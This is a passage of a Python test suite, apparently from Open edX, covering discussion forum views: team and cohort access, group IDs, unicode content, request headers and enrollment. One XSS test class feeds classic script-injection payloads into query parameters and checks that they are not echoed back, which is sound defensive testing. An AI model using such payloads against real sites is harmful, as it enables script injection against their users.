\"\"\"\n Verify that standalone threads don't go through discussion_category_id_access method.\n \"\"\"\n # For this rather pathological test, we are assigning the alpha block discussion_id (commentable_id)\n # to a team so that we can verify that standalone threads don't go through discussion_category_id_access.\n thread_id = \"test_thread_id\"\n CourseTeamFactory(\n name=\"A team\",\n course_id=self.course.id,\n topic_id='topic_id',\n discussion_topic_id=self.alpha_block.discussion_id\n )\n mock_request.side_effect = make_mock_request_impl(\n course=self.course, text=\"dummy content\", thread_id=thread_id,\n commentable_id=self.alpha_block.discussion_id\n )\n\n # If a thread returns context other than \"course\", the access check is not done, and the beta user\n # can see the alpha discussion block.\n self.assert_can_access(self.beta_user, self.alpha_block.discussion_id, thread_id, True)\n\n\n@patch('openedx.core.djangoapps.django_comment_common.comment_client.utils.requests.request', autospec=True)\nclass InlineDiscussionContextTestCase(ForumsEnableMixin, ModuleStoreTestCase): # lint-amnesty, pylint: disable=missing-class-docstring\n\n def setUp(self):\n super().setUp()\n self.course = CourseFactory.create()\n CourseEnrollmentFactory(user=self.user, course_id=self.course.id)\n self.discussion_topic_id = \"dummy_topic\"\n self.team = CourseTeamFactory(\n name=\"A team\",\n 
course_id=self.course.id,\n topic_id='topic_id',\n discussion_topic_id=self.discussion_topic_id\n )\n\n self.team.add_user(self.user)\n self.user_not_in_team = UserFactory.create()\n\n def test_context_can_be_standalone(self, mock_request):\n mock_request.side_effect = make_mock_request_impl(\n course=self.course,\n text=\"dummy text\",\n commentable_id=self.discussion_topic_id\n )\n\n request = RequestFactory().get(\"dummy_url\")\n request.user = self.user\n\n response = views.inline_discussion(\n request,\n str(self.course.id),\n self.discussion_topic_id,\n )\n\n json_response = json.loads(response.content.decode('utf-8'))\n assert json_response['discussion_data'][0]['context'] == ThreadContext.STANDALONE\n\n def test_private_team_discussion(self, mock_request):\n # First set the team discussion to be private\n CourseEnrollmentFactory(user=self.user_not_in_team, course_id=self.course.id)\n request = RequestFactory().get(\"dummy_url\")\n request.user = self.user_not_in_team\n\n mock_request.side_effect = make_mock_request_impl(\n course=self.course,\n text=\"dummy text\",\n commentable_id=self.discussion_topic_id\n )\n\n with patch('lms.djangoapps.teams.api.is_team_discussion_private', autospec=True) as mocked:\n mocked.return_value = True\n response = views.inline_discussion(\n request,\n str(self.course.id),\n self.discussion_topic_id,\n )\n assert response.status_code == 403\n assert response.content.decode('utf-8') == views.TEAM_PERMISSION_MESSAGE\n\n\n@patch('openedx.core.djangoapps.django_comment_common.comment_client.utils.requests.request', autospec=True)\nclass InlineDiscussionGroupIdTestCase( # lint-amnesty, pylint: disable=missing-class-docstring\n CohortedTestCase,\n CohortedTopicGroupIdTestMixin,\n NonCohortedTopicGroupIdTestMixin\n):\n cs_endpoint = \"/threads\"\n\n def setUp(self):\n super().setUp()\n self.cohorted_commentable_id = 'cohorted_topic'\n\n def call_view(self, mock_request, commentable_id, user, group_id, pass_group_id=True):\n kwargs = {'commentable_id': self.cohorted_commentable_id}\n if group_id:\n # avoid causing a server error when the LMS chokes attempting\n # to find a group name for the group_id, when we're testing with\n # an invalid one.\n try:\n CourseUserGroup.objects.get(id=group_id)\n kwargs['group_id'] = group_id\n except CourseUserGroup.DoesNotExist:\n pass\n mock_request.side_effect = make_mock_request_impl(self.course, \"dummy content\", **kwargs)\n\n request_data = {}\n if pass_group_id:\n request_data[\"group_id\"] = group_id\n request = RequestFactory().get(\n \"dummy_url\",\n data=request_data\n )\n request.user = user\n return views.inline_discussion(\n request,\n str(self.course.id),\n commentable_id\n )\n\n def test_group_info_in_ajax_response(self, mock_request):\n response = self.call_view(\n mock_request,\n self.cohorted_commentable_id,\n self.student,\n self.student_cohort.id\n )\n self._assert_json_response_contains_group_info(\n response, lambda d: d['discussion_data'][0]\n )\n\n\n@patch('openedx.core.djangoapps.django_comment_common.comment_client.utils.requests.request', autospec=True)\nclass ForumFormDiscussionGroupIdTestCase(CohortedTestCase, CohortedTopicGroupIdTestMixin): # lint-amnesty, pylint: disable=missing-class-docstring\n cs_endpoint = \"/threads\"\n\n def call_view(self, mock_request, commentable_id, user, group_id, pass_group_id=True, is_ajax=False): # pylint: disable=arguments-differ\n kwargs = {}\n if group_id:\n kwargs['group_id'] = group_id\n mock_request.side_effect = make_mock_request_impl(self.course, \"dummy 
content\", **kwargs)\n\n request_data = {}\n if pass_group_id:\n request_data[\"group_id\"] = group_id\n headers = {}\n if is_ajax:\n headers['HTTP_X_REQUESTED_WITH'] = \"XMLHttpRequest\"\n\n self.client.login(username=user.username, password=self.TEST_PASSWORD)\n return self.client.get(\n reverse(\"forum_form_discussion\", args=[str(self.course.id)]),\n data=request_data,\n **headers\n )\n\n def test_group_info_in_html_response(self, mock_request):\n response = self.call_view(\n mock_request,\n \"cohorted_topic\",\n self.student,\n self.student_cohort.id\n )\n self._assert_html_response_contains_group_info(response)\n\n def test_group_info_in_ajax_response(self, mock_request):\n response = self.call_view(\n mock_request,\n \"cohorted_topic\",\n self.student,\n self.student_cohort.id,\n is_ajax=True\n )\n self._assert_json_response_contains_group_info(\n response, lambda d: d['discussion_data'][0]\n )\n\n\n@patch('openedx.core.djangoapps.django_comment_common.comment_client.utils.requests.request', autospec=True)\nclass UserProfileDiscussionGroupIdTestCase(CohortedTestCase, CohortedTopicGroupIdTestMixin): # lint-amnesty, pylint: disable=missing-class-docstring\n cs_endpoint = \"/active_threads\"\n\n def call_view_for_profiled_user(\n self, mock_request, requesting_user, profiled_user, group_id, pass_group_id, is_ajax=False\n ):\n \"\"\"\n Calls \"user_profile\" view method on behalf of \"requesting_user\" to get information about\n the user \"profiled_user\".\n \"\"\"\n kwargs = {}\n if group_id:\n kwargs['group_id'] = group_id\n mock_request.side_effect = make_mock_request_impl(self.course, \"dummy content\", **kwargs)\n\n request_data = {}\n if pass_group_id:\n request_data[\"group_id\"] = group_id\n headers = {}\n if is_ajax:\n headers['HTTP_X_REQUESTED_WITH'] = \"XMLHttpRequest\"\n\n self.client.login(username=requesting_user.username, password=self.TEST_PASSWORD)\n return self.client.get(\n reverse('user_profile', args=[str(self.course.id), profiled_user.id]),\n data=request_data,\n **headers\n )\n\n def call_view(self, mock_request, _commentable_id, user, group_id, pass_group_id=True, is_ajax=False): # pylint: disable=arguments-differ\n return self.call_view_for_profiled_user(\n mock_request, user, user, group_id, pass_group_id=pass_group_id, is_ajax=is_ajax\n )\n\n def test_group_info_in_html_response(self, mock_request):\n response = self.call_view(\n mock_request,\n \"cohorted_topic\",\n self.student,\n self.student_cohort.id,\n is_ajax=False\n )\n self._assert_html_response_contains_group_info(response)\n\n def test_group_info_in_ajax_response(self, mock_request):\n response = self.call_view(\n mock_request,\n \"cohorted_topic\",\n self.student,\n self.student_cohort.id,\n is_ajax=True\n )\n self._assert_json_response_contains_group_info(\n response, lambda d: d['discussion_data'][0]\n )\n\n def _test_group_id_passed_to_user_profile(\n self, mock_request, expect_group_id_in_request, requesting_user, profiled_user, group_id, pass_group_id\n ):\n \"\"\"\n Helper method for testing whether or not group_id was passed to the user_profile request.\n \"\"\"\n\n def get_params_from_user_info_call(for_specific_course):\n \"\"\"\n Returns the request parameters for the user info call with either course_id specified or not,\n depending on value of 'for_specific_course'.\n \"\"\"\n # There will be 3 calls from user_profile. One has the cs_endpoint \"active_threads\", and it is already\n # tested. 
The other 2 calls are for user info; one of those calls is for general information about the user,\n # and it does not specify a course_id. The other call does specify a course_id, and if the caller did not\n # have discussion moderator privileges, it should also contain a group_id.\n for r_call in mock_request.call_args_list:\n if not r_call[0][1].endswith(self.cs_endpoint):\n params = r_call[1][\"params\"]\n has_course_id = \"course_id\" in params\n if (for_specific_course and has_course_id) or (not for_specific_course and not has_course_id):\n return params\n pytest.fail(\"Did not find appropriate user_profile call for 'for_specific_course'=\" + for_specific_course)\n\n mock_request.reset_mock()\n self.call_view_for_profiled_user(\n mock_request,\n requesting_user,\n profiled_user,\n group_id,\n pass_group_id=pass_group_id,\n is_ajax=False\n )\n # Should never have a group_id if course_id was not included in the request.\n params_without_course_id = get_params_from_user_info_call(False)\n assert 'group_id' not in params_without_course_id\n\n params_with_course_id = get_params_from_user_info_call(True)\n if expect_group_id_in_request:\n assert 'group_id' in params_with_course_id\n assert group_id == params_with_course_id['group_id']\n else:\n assert 'group_id' not in params_with_course_id\n\n def test_group_id_passed_to_user_profile_student(self, mock_request):\n \"\"\"\n Test that the group id is always included when requesting user profile information for a particular\n course if the requester does not have discussion moderation privileges.\n \"\"\"\n def verify_group_id_always_present(profiled_user, pass_group_id):\n \"\"\"\n Helper method to verify that group_id is always present for student in course\n (non-privileged user).\n \"\"\"\n self._test_group_id_passed_to_user_profile(\n mock_request, True, self.student, profiled_user, self.student_cohort.id, pass_group_id\n )\n\n # In all these test cases, the requesting_user is the student (non-privileged user).\n # The profile returned on behalf of the student is for the profiled_user.\n verify_group_id_always_present(profiled_user=self.student, pass_group_id=True)\n verify_group_id_always_present(profiled_user=self.student, pass_group_id=False)\n verify_group_id_always_present(profiled_user=self.moderator, pass_group_id=True)\n verify_group_id_always_present(profiled_user=self.moderator, pass_group_id=False)\n\n def test_group_id_user_profile_moderator(self, mock_request):\n \"\"\"\n Test that the group id is only included when a privileged user requests user profile information for a\n particular course and user if the group_id is explicitly passed in.\n \"\"\"\n def verify_group_id_present(profiled_user, pass_group_id, requested_cohort=self.moderator_cohort):\n \"\"\"\n Helper method to verify that group_id is present.\n \"\"\"\n self._test_group_id_passed_to_user_profile(\n mock_request, True, self.moderator, profiled_user, requested_cohort.id, pass_group_id\n )\n\n def verify_group_id_not_present(profiled_user, pass_group_id, requested_cohort=self.moderator_cohort):\n \"\"\"\n Helper method to verify that group_id is not present.\n \"\"\"\n self._test_group_id_passed_to_user_profile(\n mock_request, False, self.moderator, profiled_user, requested_cohort.id, pass_group_id\n )\n\n # In all these test cases, the requesting_user is the moderator (privileged user).\n\n # If the group_id is explicitly passed, it will be present in the request.\n verify_group_id_present(profiled_user=self.student, pass_group_id=True)\n 
verify_group_id_present(profiled_user=self.moderator, pass_group_id=True)\n verify_group_id_present(\n profiled_user=self.student, pass_group_id=True, requested_cohort=self.student_cohort\n )\n\n # If the group_id is not explicitly passed, it will not be present because the requesting_user\n # has discussion moderator privileges.\n verify_group_id_not_present(profiled_user=self.student, pass_group_id=False)\n verify_group_id_not_present(profiled_user=self.moderator, pass_group_id=False)\n\n\n@patch('openedx.core.djangoapps.django_comment_common.comment_client.utils.requests.request', autospec=True)\nclass FollowedThreadsDiscussionGroupIdTestCase(CohortedTestCase, CohortedTopicGroupIdTestMixin): # lint-amnesty, pylint: disable=missing-class-docstring\n cs_endpoint = \"/subscribed_threads\"\n\n def call_view(self, mock_request, commentable_id, user, group_id, pass_group_id=True):\n kwargs = {}\n if group_id:\n kwargs['group_id'] = group_id\n mock_request.side_effect = make_mock_request_impl(self.course, \"dummy content\", **kwargs)\n\n request_data = {}\n if pass_group_id:\n request_data[\"group_id\"] = group_id\n request = RequestFactory().get(\n \"dummy_url\",\n data=request_data,\n HTTP_X_REQUESTED_WITH=\"XMLHttpRequest\"\n )\n request.user = user\n return views.followed_threads(\n request,\n str(self.course.id),\n user.id\n )\n\n def test_group_info_in_ajax_response(self, mock_request):\n response = self.call_view(\n mock_request,\n \"cohorted_topic\",\n self.student,\n self.student_cohort.id\n )\n self._assert_json_response_contains_group_info(\n response, lambda d: d['discussion_data'][0]\n )\n\n\n@patch('openedx.core.djangoapps.django_comment_common.comment_client.utils.requests.request', autospec=True)\nclass InlineDiscussionTestCase(ForumsEnableMixin, ModuleStoreTestCase): # lint-amnesty, pylint: disable=missing-class-docstring\n\n def setUp(self):\n super().setUp()\n\n self.course = CourseFactory.create(\n org=\"TestX\",\n number=\"101\",\n display_name=\"Test Course\",\n teams_configuration=TeamsConfig({\n 'topics': [{\n 'id': 'topic_id',\n 'name': 'A topic',\n 'description': 'A topic',\n }]\n })\n )\n self.student = UserFactory.create()\n CourseEnrollmentFactory(user=self.student, course_id=self.course.id)\n self.discussion1 = BlockFactory.create(\n parent_location=self.course.location,\n category=\"discussion\",\n discussion_id=\"discussion1\",\n display_name='Discussion1',\n discussion_category=\"Chapter\",\n discussion_target=\"Discussion1\"\n )\n\n def send_request(self, mock_request, params=None):\n \"\"\"\n Creates and returns a request with params set, and configures\n mock_request to return appropriate values.\n \"\"\"\n request = RequestFactory().get(\"dummy_url\", params if params else {})\n request.user = self.student\n mock_request.side_effect = make_mock_request_impl(\n course=self.course, text=\"dummy content\", commentable_id=self.discussion1.discussion_id\n )\n return views.inline_discussion(\n request, str(self.course.id), self.discussion1.discussion_id\n )\n\n def test_context(self, mock_request):\n team = CourseTeamFactory(\n name='Team Name',\n topic_id='topic_id',\n course_id=self.course.id,\n discussion_topic_id=self.discussion1.discussion_id\n )\n\n team.add_user(self.student)\n\n self.send_request(mock_request)\n assert mock_request.call_args[1]['params']['context'] == ThreadContext.STANDALONE\n\n\n@patch('requests.request', autospec=True)\nclass UserProfileTestCase(ForumsEnableMixin, UrlResetMixin, ModuleStoreTestCase): # lint-amnesty, pylint: 
disable=missing-class-docstring\n\n TEST_THREAD_TEXT = 'userprofile-test-text'\n TEST_THREAD_ID = 'userprofile-test-thread-id'\n\n @patch.dict(\"django.conf.settings.FEATURES\", {\"ENABLE_DISCUSSION_SERVICE\": True})\n def setUp(self):\n super().setUp()\n\n self.course = CourseFactory.create()\n self.student = UserFactory.create()\n self.profiled_user = UserFactory.create()\n CourseEnrollmentFactory.create(user=self.student, course_id=self.course.id)\n CourseEnrollmentFactory.create(user=self.profiled_user, course_id=self.course.id)\n\n def get_response(self, mock_request, params, **headers): # lint-amnesty, pylint: disable=missing-function-docstring\n mock_request.side_effect = make_mock_request_impl(\n course=self.course, text=self.TEST_THREAD_TEXT, thread_id=self.TEST_THREAD_ID\n )\n self.client.login(username=self.student.username, password=self.TEST_PASSWORD)\n\n response = self.client.get(\n reverse('user_profile', kwargs={\n 'course_id': str(self.course.id),\n 'user_id': self.profiled_user.id,\n }),\n data=params,\n **headers\n )\n mock_request.assert_any_call(\n \"get\",\n StringEndsWithMatcher(f'/users/{self.profiled_user.id}/active_threads'),\n data=None,\n params=PartialDictMatcher({\n \"course_id\": str(self.course.id),\n \"page\": params.get(\"page\", 1),\n \"per_page\": views.THREADS_PER_PAGE\n }),\n headers=ANY,\n timeout=ANY\n )\n return response\n\n def check_html(self, mock_request, **params): # lint-amnesty, pylint: disable=missing-function-docstring\n response = self.get_response(mock_request, params)\n assert response.status_code == 200\n assert response['Content-Type'] == 'text/html; charset=utf-8'\n html = response.content.decode('utf-8')\n self.assertRegex(html, r'data-page=\"1\"')\n self.assertRegex(html, r'data-num-pages=\"1\"')\n self.assertRegex(html, r'<span>1</span> discussion started')\n self.assertRegex(html, r'<span>2</span> comments')\n self.assertRegex(html, f'&#39;id&#39;: &#39;{self.TEST_THREAD_ID}&#39;')\n self.assertRegex(html, f'&#39;title&#39;: &#39;{self.TEST_THREAD_TEXT}&#39;')\n self.assertRegex(html, f'&#39;body&#39;: &#39;{self.TEST_THREAD_TEXT}&#39;')\n self.assertRegex(html, f'&#39;username&#39;: &#39;{self.student.username}&#39;')\n\n def check_ajax(self, mock_request, **params): # lint-amnesty, pylint: disable=missing-function-docstring\n response = self.get_response(mock_request, params, HTTP_X_REQUESTED_WITH=\"XMLHttpRequest\")\n assert response.status_code == 200\n assert response['Content-Type'] == 'application/json; charset=utf-8'\n response_data = json.loads(response.content.decode('utf-8'))\n assert sorted(response_data.keys()) == ['annotated_content_info', 'discussion_data', 'num_pages', 'page']\n assert len(response_data['discussion_data']) == 1\n assert response_data['page'] == 1\n assert response_data['num_pages'] == 1\n assert response_data['discussion_data'][0]['id'] == self.TEST_THREAD_ID\n assert response_data['discussion_data'][0]['title'] == self.TEST_THREAD_TEXT\n assert response_data['discussion_data'][0]['body'] == self.TEST_THREAD_TEXT\n\n def test_html(self, mock_request):\n self.check_html(mock_request)\n\n def test_ajax(self, mock_request):\n self.check_ajax(mock_request)\n\n def test_404_non_enrolled_user(self, __):\n \"\"\"\n Test that when a student tries to visit an un-enrolled student's discussion profile,\n the system raises Http404.\n \"\"\"\n unenrolled_user = UserFactory.create()\n request = RequestFactory().get(\"dummy_url\")\n request.user = self.student\n with pytest.raises(Http404):\n views.user_profile(\n request,\n str(self.course.id),\n unenrolled_user.id\n )\n\n def test_404_profiled_user(self, 
_mock_request):\n request = RequestFactory().get(\"dummy_url\")\n request.user = self.student\n with pytest.raises(Http404):\n views.user_profile(\n request,\n str(self.course.id),\n -999\n )\n\n def test_404_course(self, _mock_request):\n request = RequestFactory().get(\"dummy_url\")\n request.user = self.student\n with pytest.raises(Http404):\n views.user_profile(\n request,\n \"non/existent/course\",\n self.profiled_user.id\n )\n\n def test_post(self, mock_request):\n mock_request.side_effect = make_mock_request_impl(\n course=self.course, text=self.TEST_THREAD_TEXT, thread_id=self.TEST_THREAD_ID\n )\n request = RequestFactory().post(\"dummy_url\")\n request.user = self.student\n response = views.user_profile(\n request,\n str(self.course.id),\n self.profiled_user.id\n )\n assert response.status_code == 405\n\n\n@patch('requests.request', autospec=True)\nclass CommentsServiceRequestHeadersTestCase(ForumsEnableMixin, UrlResetMixin, ModuleStoreTestCase): # lint-amnesty, pylint: disable=missing-class-docstring\n\n CREATE_USER = False\n\n @patch.dict(\"django.conf.settings.FEATURES\", {\"ENABLE_DISCUSSION_SERVICE\": True})\n def setUp(self):\n super().setUp()\n\n username = \"foo\"\n password = \"bar\"\n\n # Invoke UrlResetMixin\n super().setUp()\n self.course = CourseFactory.create(discussion_topics={'dummy discussion': {'id': 'dummy_discussion_id'}})\n self.student = UserFactory.create(username=username, password=password)\n CourseEnrollmentFactory.create(user=self.student, course_id=self.course.id)\n assert self.client.login(username=username, password=password)\n\n self.addCleanup(translation.deactivate)\n\n def assert_all_calls_have_header(self, mock_request, key, value): # lint-amnesty, pylint: disable=missing-function-docstring\n expected = call(\n ANY, # method\n ANY, # url\n data=ANY,\n params=ANY,\n headers=PartialDictMatcher({key: value}),\n timeout=ANY\n )\n for actual in mock_request.call_args_list:\n assert expected == actual\n\n def test_accept_language(self, mock_request):\n lang = \"eo\"\n text = \"dummy content\"\n thread_id = \"test_thread_id\"\n mock_request.side_effect = make_mock_request_impl(course=self.course, text=text, thread_id=thread_id)\n\n self.client.get(\n reverse(\n \"single_thread\",\n kwargs={\n \"course_id\": str(self.course.id),\n \"discussion_id\": \"dummy_discussion_id\",\n \"thread_id\": thread_id,\n }\n ),\n HTTP_ACCEPT_LANGUAGE=lang,\n )\n self.assert_all_calls_have_header(mock_request, \"Accept-Language\", lang)\n\n @override_settings(COMMENTS_SERVICE_KEY=\"test_api_key\")\n def test_api_key(self, mock_request):\n mock_request.side_effect = make_mock_request_impl(course=self.course, text=\"dummy\", thread_id=\"dummy\")\n\n self.client.get(\n reverse(\n \"forum_form_discussion\",\n kwargs={\"course_id\": str(self.course.id)}\n ),\n )\n self.assert_all_calls_have_header(mock_request, \"X-Edx-Api-Key\", \"test_api_key\")\n\n\nclass InlineDiscussionUnicodeTestCase(ForumsEnableMixin, SharedModuleStoreTestCase, UnicodeTestMixin): # lint-amnesty, pylint: disable=missing-class-docstring\n\n @classmethod\n def setUpClass(cls):\n # pylint: disable=super-method-not-called\n with super().setUpClassAndTestData():\n cls.course = CourseFactory.create()\n\n @classmethod\n def setUpTestData(cls):\n super().setUpTestData()\n\n cls.student = UserFactory.create()\n CourseEnrollmentFactory(user=cls.student, course_id=cls.course.id)\n\n @patch('openedx.core.djangoapps.django_comment_common.comment_client.utils.requests.request', autospec=True)\n def 
_test_unicode_data(self, text, mock_request): # lint-amnesty, pylint: disable=missing-function-docstring\n mock_request.side_effect = make_mock_request_impl(course=self.course, text=text)\n request = RequestFactory().get(\"dummy_url\")\n request.user = self.student\n\n response = views.inline_discussion(\n request, str(self.course.id), self.course.discussion_topics['General']['id']\n )\n assert response.status_code == 200\n response_data = json.loads(response.content.decode('utf-8'))\n assert response_data['discussion_data'][0]['title'] == text\n assert response_data['discussion_data'][0]['body'] == text\n\n\nclass ForumFormDiscussionUnicodeTestCase(ForumsEnableMixin, SharedModuleStoreTestCase, UnicodeTestMixin): # lint-amnesty, pylint: disable=missing-class-docstring\n\n @classmethod\n def setUpClass(cls):\n # pylint: disable=super-method-not-called\n with super().setUpClassAndTestData():\n cls.course = CourseFactory.create()\n\n @classmethod\n def setUpTestData(cls):\n super().setUpTestData()\n\n cls.student = UserFactory.create()\n CourseEnrollmentFactory(user=cls.student, course_id=cls.course.id)\n\n @patch('openedx.core.djangoapps.django_comment_common.comment_client.utils.requests.request', autospec=True)\n def _test_unicode_data(self, text, mock_request): # lint-amnesty, pylint: disable=missing-function-docstring\n mock_request.side_effect = make_mock_request_impl(course=self.course, text=text)\n request = RequestFactory().get(\"dummy_url\")\n request.user = self.student\n # so (request.headers.get('x-requested-with') == 'XMLHttpRequest') == True\n request.META[\"HTTP_X_REQUESTED_WITH\"] = \"XMLHttpRequest\"\n\n response = views.forum_form_discussion(request, str(self.course.id))\n assert response.status_code == 200\n response_data = json.loads(response.content.decode('utf-8'))\n assert response_data['discussion_data'][0]['title'] == text\n assert response_data['discussion_data'][0]['body'] == text\n\n\n@ddt.ddt\n@patch('openedx.core.djangoapps.django_comment_common.comment_client.utils.requests.request', autospec=True)\nclass ForumDiscussionXSSTestCase(ForumsEnableMixin, UrlResetMixin, ModuleStoreTestCase): # lint-amnesty, pylint: disable=missing-class-docstring\n\n @patch.dict(\"django.conf.settings.FEATURES\", {\"ENABLE_DISCUSSION_SERVICE\": True})\n def setUp(self):\n super().setUp()\n\n username = \"foo\"\n password = \"bar\"\n\n self.course = CourseFactory.create()\n self.student = UserFactory.create(username=username, password=password)\n CourseEnrollmentFactory.create(user=self.student, course_id=self.course.id)\n assert self.client.login(username=username, password=password)\n\n @ddt.data('\"><script>alert(1)</script>', '<script>alert(1)</script>', '</script><script>alert(1)</script>')\n @patch('common.djangoapps.student.models.user.cc.User.from_django_user')\n def test_forum_discussion_xss_prevent(self, malicious_code, mock_user, mock_req):\n \"\"\"\n Test that an XSS attack is prevented\n \"\"\"\n mock_user.return_value.to_dict.return_value = {}\n mock_req.return_value.status_code = 200\n reverse_url = \"{}{}\".format(reverse(\n \"forum_form_discussion\",\n kwargs={\"course_id\": str(self.course.id)}), '/forum_form_discussion')\n # Test that malicious code does not appear in html\n url = \"{}?{}={}\".format(reverse_url, 'sort_key', malicious_code)\n resp = self.client.get(url)\n self.assertNotContains(resp, malicious_code)\n\n @ddt.data('\"><script>alert(1)</script>', '<script>alert(1)</script>', '</script><script>alert(1)</script>')\n @patch('common.djangoapps.student.models.user.cc.User.from_django_user')\n @patch('common.djangoapps.student.models.user.cc.User.active_threads')\n def test_forum_user_profile_xss_prevent(self, 
malicious_code, mock_threads, mock_from_django_user, mock_request):\n \"\"\"\n Test that XSS attack is prevented\n \"\"\"\n mock_threads.return_value = [], 1, 1\n mock_from_django_user.return_value.to_dict.return_value = {\n 'upvoted_ids': [],\n 'downvoted_ids': [],\n 'subscribed_thread_ids': []\n }\n mock_request.side_effect = make_mock_request_impl(course=self.course, text='dummy')\n\n url = reverse('user_profile',\n kwargs={'course_id': str(self.course.id), 'user_id': str(self.student.id)})\n # Test that malicious code does not appear in html\n url_string = \"{}?{}={}\".format(url, 'page', malicious_code)\n resp = self.client.get(url_string)\n self.assertNotContains(resp, malicious_code)\n\n\nclass ForumDiscussionSearchUnicodeTestCase(ForumsEnableMixin, SharedModuleStoreTestCase, UnicodeTestMixin): # lint-amnesty, pylint: disable=missing-class-docstring\n\n @classmethod\n def setUpClass(cls):\n # pylint: disable=super-method-not-called\n with super().setUpClassAndTestData():\n cls.course = CourseFactory.create()\n\n @classmethod\n def setUpTestData(cls):\n super().setUpTestData()\n\n cls.student = UserFactory.create()\n CourseEnrollmentFactory(user=cls.student, course_id=cls.course.id)\n\n @patch('openedx.core.djangoapps.django_comment_common.comment_client.utils.requests.request', autospec=True)\n def _test_unicode_data(self, text, mock_request): # lint-amnesty, pylint: disable=missing-function-docstring\n mock_request.side_effect = make_mock_request_impl(course=self.course, text=text)\n data = {\n \"ajax\": 1,\n \"text\": text,\n }\n request = RequestFactory().get(\"dummy_url\", data)\n request.user = self.student\n # so (request.headers.get('x-requested-with') == 'XMLHttpRequest') == True\n request.META[\"HTTP_X_REQUESTED_WITH\"] = \"XMLHttpRequest\"\n\n response = views.forum_form_discussion(request, str(self.course.id))\n assert response.status_code == 200\n response_data = json.loads(response.content.decode('utf-8'))\n assert response_data['discussion_data'][0]['title'] == text\n assert response_data['discussion_data'][0]['body'] == text\n\n\nclass SingleThreadUnicodeTestCase(ForumsEnableMixin, SharedModuleStoreTestCase, UnicodeTestMixin): # lint-amnesty, pylint: disable=missing-class-docstring\n\n @classmethod\n def setUpClass(cls):\n # pylint: disable=super-method-not-called\n with super().setUpClassAndTestData():\n cls.course = CourseFactory.create(discussion_topics={'dummy_discussion_id': {'id': 'dummy_discussion_id'}})\n\n @classmethod\n def setUpTestData(cls):\n super().setUpTestData()\n\n cls.student = UserFactory.create()\n CourseEnrollmentFactory(user=cls.student, course_id=cls.course.id)\n\n @patch('openedx.core.djangoapps.django_comment_common.comment_client.utils.requests.request', autospec=True)\n def _test_unicode_data(self, text, mock_request): # lint-amnesty, pylint: disable=missing-function-docstring\n thread_id = \"test_thread_id\"\n mock_request.side_effect = make_mock_request_impl(course=self.course, text=text, thread_id=thread_id)\n request = RequestFactory().get(\"dummy_url\")\n request.user = self.student\n # so (request.headers.get('x-requested-with') == 'XMLHttpRequest') == True\n request.META[\"HTTP_X_REQUESTED_WITH\"] = \"XMLHttpRequest\"\n\n response = views.single_thread(request, str(self.course.id), \"dummy_discussion_id\", thread_id)\n assert response.status_code == 200\n response_data = json.loads(response.content.decode('utf-8'))\n assert response_data['content']['title'] == text\n assert response_data['content']['body'] == text\n\n\nclass 
UserProfileUnicodeTestCase(ForumsEnableMixin, SharedModuleStoreTestCase, UnicodeTestMixin): # lint-amnesty, pylint: disable=missing-class-docstring\n\n @classmethod\n def setUpClass(cls):\n # pylint: disable=super-method-not-called\n with super().setUpClassAndTestData():\n cls.course = CourseFactory.create()\n\n @classmethod\n def setUpTestData(cls):\n super().setUpTestData()\n\n cls.student = UserFactory.create()\n CourseEnrollmentFactory(user=cls.student, course_id=cls.course.id)\n\n @patch('openedx.core.djangoapps.django_comment_common.comment_client.utils.requests.request', autospec=True)\n def _test_unicode_data(self, text, mock_request): # lint-amnesty, pylint: disable=missing-function-docstring\n mock_request.side_effect = make_mock_request_impl(course=self.course, text=text)\n request = RequestFactory().get(\"dummy_url\")\n request.user = self.student\n # so (request.headers.get('x-requested-with') == 'XMLHttpRequest') == True\n request.META[\"HTTP_X_REQUESTED_WITH\"] = \"XMLHttpRequest\"\n\n response = views.user_profile(request, str(self.course.id), str(self.student.id))\n assert response.status_code == 200\n response_data = json.loads(response.content.decode('utf-8'))\n assert response_data['discussion_data'][0]['title'] == text\n assert response_data['discussion_data'][0]['body'] == text\n\n\nclass FollowedThreadsUnicodeTestCase(ForumsEnableMixin, SharedModuleStoreTestCase, UnicodeTestMixin): # lint-amnesty, pylint: disable=missing-class-docstring\n\n @classmethod\n def setUpClass(cls):\n # pylint: disable=super-method-not-called\n with super().setUpClassAndTestData():\n cls.course = CourseFactory.create()\n\n @classmethod\n def setUpTestData(cls):\n super().setUpTestData()\n\n cls.student = UserFactory.create()\n CourseEnrollmentFactory(user=cls.student, course_id=cls.course.id)\n\n @patch('openedx.core.djangoapps.django_comment_common.comment_client.utils.requests.request', autospec=True)\n def _test_unicode_data(self, text, mock_request): # lint-amnesty, pylint: disable=missing-function-docstring\n mock_request.side_effect = make_mock_request_impl(course=self.course, text=text)\n request = RequestFactory().get(\"dummy_url\")\n request.user = self.student\n # so (request.headers.get('x-requested-with') == 'XMLHttpRequest') == True\n request.META[\"HTTP_X_REQUESTED_WITH\"] = \"XMLHttpRequest\"\n\n response = views.followed_threads(request, str(self.course.id), str(self.student.id))\n assert response.status_code == 200\n response_data = json.loads(response.content.decode('utf-8'))\n assert response_data['discussion_data'][0]['title'] == text\n assert response_data['discussion_data'][0]['body'] == text\n\n\nclass EnrollmentTestCase(ForumsEnableMixin, ModuleStoreTestCase):\n \"\"\"\n Tests for the behavior of views depending on if the student is enrolled\n in the course\n \"\"\"\n\n @patch.dict(\"django.conf.settings.FEATURES\", {\"ENABLE_DISCUSSION_SERVICE\": True})\n def setUp(self):\n super().setUp()\n self.course = CourseFactory.create()\n self.student = UserFactory.create()\n\n @patch.dict(\"django.conf.settings.FEATURES\", {\"ENABLE_DISCUSSION_SERVICE\": True})\n @patch('openedx.core.djangoapps.django_comment_common.comment_client.utils.requests.request', autospec=True)\n def test_unenrolled(self, mock_request):\n mock_request.side_effect = make_mock_request_impl(course=self.course, text='dummy')\n request = RequestFactory().get('dummy_url')\n request.user = self.student\n with pytest.raises(CourseAccessRedirect):\n views.forum_form_discussion(request, 
